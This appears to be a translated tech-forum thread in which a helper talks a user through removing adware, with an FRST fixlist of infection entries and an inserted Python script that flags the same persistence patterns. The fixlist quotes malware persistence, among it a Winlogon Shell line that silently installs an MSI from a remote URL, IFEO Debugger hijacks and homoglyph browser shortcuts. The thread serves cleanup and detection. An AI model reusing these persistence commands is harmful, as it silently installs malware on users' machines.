Ourluckysites, Kitty, iSafe and others?

kylupl91 07 May 2017 12:53 498 5
  • #1 07 May 2017 12:53
    kylupl91
    Level 2

    Please help, I have had a problem with my computer for some time.

    Ourluckysites, Kitty, iSafe.
    I have Mozilla on the computer even though I did not install it, and it is not listed in Add/Remove Programs....

    Various scans are attached.

    I keep trying to remove them, but they are still there. Can anyone help?

  • #2 07 May 2017 13:04
    Kolobos
    Computer specialist

    Make a backup of your Firefox bookmarks; the browser profile will be deleted.

    In Chrome's settings, turn off restoring the set of pages on browser startup.

    Uninstall YAC (Yet Another Cleaner!).

    Next to frst.exe, create a file Fixlist.txt with the following contents:
    CloseProcesses:
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\...\ChromeHTML: -> "C:\Program Files (x86)\Dayglad\Application\chrome.exe" "%1" <==== UWAGA
    CustomCLSID: HKU\S-1-5-21-1918708475-468582227-3343396697-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\Krzysztof Romanowski\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileSyncShell64.dll => Brak pliku
    CustomCLSID: HKU\S-1-5-21-1918708475-468582227-3343396697-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\Krzysztof Romanowski\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileSyncShell64.dll => Brak pliku
    CustomCLSID: HKU\S-1-5-21-1918708475-468582227-3343396697-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\Krzysztof Romanowski\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileSyncShell64.dll => Brak pliku
    Task: {57416705-A3A5-48EA-9515-6916AE6B2FE5} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== UWAGA
    Task: {C4CBD57D-7C37-478E-B536-AC06243069B0} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
    Task: {C598AF47-132C-47B7-84A3-67D74221EDBE} - \PowerWord-SCT-JT -> Brak pliku <==== UWAGA
    Task: {F08701EA-78B8-4736-8BF4-0132095649EB} - \Windows-WoShiBeiYongDe -> Brak pliku <==== UWAGA
    ShortcutWithArgument: C:\Users\Krzysztof Romanowski\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    ShortcutWithArgument: C:\Users\Krzysztof Romanowski\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gооglе Сhrоmе.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    2017-05-05 23:19 - 2017-05-02 08:44 - 00323584 _____ () C:\Users\Krzysztof Romanowski\AppData\Local\background_fault\bf.dll
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\...\Run: [background_fault] => C:\Users\Krzysztof Romanowski\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-03] (AVAST Software) <===== UWAGA
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1LFTZLMkI2OTJQRYQXFjE1MWVSMWhYFkIxNTRXNUExMH== /q
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\...\MountPoints2: {5a072129-0e29-11e7-9bfe-9c5c8e51e4cf} - "G:\HiSuiteDownLoader.exe"
    HKU\S-1-5-18\...\Run: [] => [X]
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\$McRebootA5E6DEAA56$.lnk [2017-04-28]
    ShortcutTarget: $McRebootA5E6DEAA56$.lnk -> (Brak pliku)
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    SearchScopes: HKU\S-1-5-21-1918708475-468582227-3343396697-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1918708475-468582227-3343396697-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    Edge HomeButtonPage: HKU\S-1-5-21-1918708475-468582227-3343396697-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    FF DefaultProfile: jg3fwavc.default
    FF ProfilePath: C:\Users\Krzysztof Romanowski\AppData\Roaming\Firefox\Firefox\Profiles\jg3fwavc.default [2017-05-07]
    FF Extension: (HSearch) - C:\Users\Krzysztof Romanowski\AppData\Roaming\Firefox\Firefox\Profiles\jg3fwavc.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-05-03] [Brak podpisu cyfrowego]
    FF Extension: (FF Adr) - C:\Users\Krzysztof Romanowski\AppData\Roaming\Firefox\Firefox\Profiles\jg3fwavc.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-05-03] [Brak podpisu cyfrowego]
    FF Extension: (Polski Language Pack) - C:\Users\Krzysztof Romanowski\AppData\Roaming\Firefox\Firefox\Profiles\jg3fwavc.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-03] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Users\Krzysztof Romanowski\AppData\Roaming\Firefox\Firefox\Profiles\jg3fwavc.default\searchplugins\startsearch.xml [2017-05-03]
    CHR DefaultProfile: Default
    CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1493789952&z=0933a8ea31145acb77130a9g0zet7cemfb4t5t3z8w&from=ypid&uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX"
    CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> ourluckysites
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
    StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Dayglad\Application\chrome.exe <==== UWA
    R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-04] (windows) [Brak podpisu cyfrowego]
    S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda)
    R2 Kitty; C:\Users\Krzysztof Romanowski\AppData\Local\Kitty\Kitty.dll [123904 2017-05-03] (word) [Brak podpisu cyfrowego] <==== UWAGA
    R2 WinSAPSvc; C:\Users\Krzysztof Romanowski\AppData\Roaming\WinSAPSvc\WinSAP.dll [603648 2017-05-05] (WinSAP) [Brak podpisu cyfrowego] <==== UWAGA
    S2 3DM; C:\Users\Krzysztof Romanowski\AppData\Local\3DM\Kitty.dll [X]
    S2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [X]
    S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
    S2 IISvr; C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\te\msdeploy.resources.dll [X]
    2017-05-05 23:19 - 2017-05-07 09:30 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\background_fault
    2017-05-05 23:18 - 2017-05-05 23:18 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\WANARE
    2017-05-05 23:18 - 2017-05-05 23:18 - 00000000 ____D C:\ProgramData\BIT
    2017-05-03 23:27 - 2017-05-07 11:05 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-05-03 23:27 - 2017-05-05 23:19 - 00003622 _____ C:\WINDOWS\System32\Tasks\Windows-PG
    2017-05-03 23:27 - 2017-05-05 23:19 - 00000000 ____D C:\WINDOWS\psgo
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Users\Public\Documents\Google
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Roaming\Firefox
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\SNAREA
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\Kitty
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\Firefox
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\Dayglad
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Program Files (x86)\IIS
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Program Files (x86)\Firefox
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Program Files (x86)\Dayglad
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 _____ C:\WINDOWS\SysWOW64\33
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-05-02 11:40 - 2017-05-05 23:18 - 00003708 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-05-02 11:40 - 2017-05-05 23:18 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Roaming\WinSAPSvc
    2017-05-02 11:40 - 2017-05-03 07:39 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\SNARE
    2017-05-02 11:40 - 2017-05-02 11:40 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-28 20:43 - 2017-05-07 11:53 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-28 19:58 - 2017-05-07 10:48 - 00000000 ____D C:\AdwCleaner
    2017-04-28 13:39 - 2017-04-28 20:12 - 00000000 ____D C:\ProgramData\McAfee
    2017-04-27 21:05 - 2017-04-28 20:21 - 00000000 ____D C:\WINDOWS\system32\log
    2017-04-27 21:04 - 2017-04-27 21:04 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Roaming\Elex-tech
    2017-04-27 21:04 - 2017-04-27 21:04 - 00000000 ____D C:\Program Files (x86)\Elex-tech
    2017-04-25 18:55 - 2017-04-25 18:55 - 00000007 _____ C:\WINDOWS\SysWOW64\81F6.tmp
    2017-04-25 18:50 - 2017-05-03 07:38 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-04-25 12:07 - 2017-04-25 12:07 - 00000000 ____D C:\Program Files (x86)\Adware Removal Tool by TSA
    2017-04-25 10:32 - 2017-04-25 10:32 - 00000016 _____ C:\ProgramData\mntemp
    2017-04-20 11:01 - 2017-04-25 18:55 - 00000000 _____ C:\WINDOWS\SysWOW64\22
    2017-04-19 08:22 - 2017-04-20 17:55 - 00000000 _____ C:\WINDOWS\SysWOW64\1
    2017-04-19 08:21 - 2017-04-20 11:01 - 00000000 ____D C:\Program Files (x86)\MK
    2017-04-17 21:00 - 2017-05-07 11:59 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\LocalLow\Mozilla
    2017-04-17 20:59 - 2017-04-20 17:59 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
    2017-04-17 20:59 - 2017-04-17 20:59 - 00000007 _____ C:\WINDOWS\SysWOW64\B756.tmp
    2017-04-17 20:59 - 2017-04-17 20:59 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Roaming\Mozilla
    2017-04-17 20:59 - 2017-04-17 20:59 - 00000000 ____D C:\ProgramData\Software
    2017-04-25 18:48 - 2017-02-07 10:59 - 00000000 ____D C:\Program Files (x86)\ScreenShot
    2017-04-25 10:32 - 2017-04-25 10:32 - 0000016 _____ () C:\ProgramData\mntemp
    EmptyTemp:

    In FRST, choose Fix.

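As an added illustration (not code from this thread, from FRST or from its author), the script below runs the checks that the fixlist above was built from over constructed FRST-style lines: shortcut names that mix Latin with Cyrillic look-alike letters (the same trick as the second "Internet Explorer.lnk", which post #6 has deleted by hand), shortcuts that pass a URL to the browser, IFEO Debugger entries on system tools, and a Winlogon Shell policy that runs anything besides explorer.exe. The user name, the SID and the Shell-policy domain in the sample are placeholders, and the look-alike file name is built with explicit Cyrillic code points.

```python
"""Triage of FRST-style log lines for the persistence patterns in this thread."""
import re
import unicodedata

# FRST writes defanged "hxxp" URLs; accept both spellings.
URL_RE = re.compile(r"\bh(?:xx|tt)ps?://", re.IGNORECASE)

# Constructed look-alike name: Latin e/E/x/p/o replaced by Cyrillic е/Е/х/р/о.
HOMOGLYPH_IE = "Int\u0435rn\u0435t \u0415\u0445\u0440l\u043er\u0435r.lnk"
ACCESSORIES = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories"

# Constructed sample lines modelled on the fixlist above (user, SID and the
# Shell-policy domain are placeholders, not values from the thread).
SAMPLE_LOG = [
    "ShortcutWithArgument: " + ACCESSORIES + r"\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc",
    "ShortcutWithArgument: " + ACCESSORIES + "\\" + HOMOGLYPH_IE + r" -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc",
    r"ShortcutWithArgument: C:\Users\user\Desktop\Notatki.lnk -> C:\WINDOWS\notepad.exe (Microsoft Corporation) -> C:\Users\user\notatki.txt",
    r"IFEO\taskmgr.exe: [Debugger]",
    r"HKU\S-1-5-21-PLACEHOLDER\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.example.invalid/?data=PLACEHOLDER /q",
    r"FF Extension: (Polski Language Pack) - C:\Users\user\AppData\Roaming\Firefox\Profiles\x.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-03]",
]


def scripts_in(name):
    """Set of Unicode scripts (first word of each letter's name) used in a file name."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in name if ch.isalpha()}


def triage(lines):
    """Return [(line_no, reason)] for every line matching one of the patterns."""
    hits = []
    for no, line in enumerate(lines, 1):
        if line.startswith("ShortcutWithArgument: "):
            parts = line[len("ShortcutWithArgument: "):].split(" -> ")
            lnk_name = parts[0].rsplit("\\", 1)[-1]
            if len(scripts_in(lnk_name)) > 1:  # Latin mixed with Cyrillic look-alikes
                hits.append((no, "mixed-script (homoglyph) shortcut name"))
            if len(parts) == 3 and URL_RE.search(parts[2]):  # browser forced onto a site
                hits.append((no, "shortcut argument is a URL"))
        elif line.startswith("IFEO\\") and "[Debugger]" in line:
            hits.append((no, "IFEO Debugger hijack"))  # system tool intercepted at launch
        elif "\\Policies\\system: [Shell]" in line:
            shell = line.split("[Shell]", 1)[1].strip()
            if shell.lower() != "explorer.exe":  # anything extra runs at every logon
                hits.append((no, "Winlogon Shell policy runs extra command"))
    return hits


if __name__ == "__main__":
    for no, reason in triage(SAMPLE_LOG):
        print(f"line {no}: {reason}")
```

The mixed-script check deliberately tolerates accented Latin letters (Polish file names stay in the LATIN script), so only a real script mix such as Latin plus Cyrillic is reported.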
  • #3 07 May 2017 15:19
    kylupl91
    Level 2

    Most of it seems to have been removed, but a few things are still left, including ourluckysite when I open Chrome.

    The log from the AdwCleaner scan is attached.

  • #4 07 May 2017 15:24
    Kolobos
    Computer specialist

    In AdwCleaner, remove everything it detected.

    Post new FRST logs from a scan.

  • #6 07 May 2017 17:55
    Kolobos
    Computer specialist

    Manually delete the file:
    C:\Users\Krzysztof Romanowski\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехрlоrеr.lnk

    Delete the C:\FRST folder, and that is all.
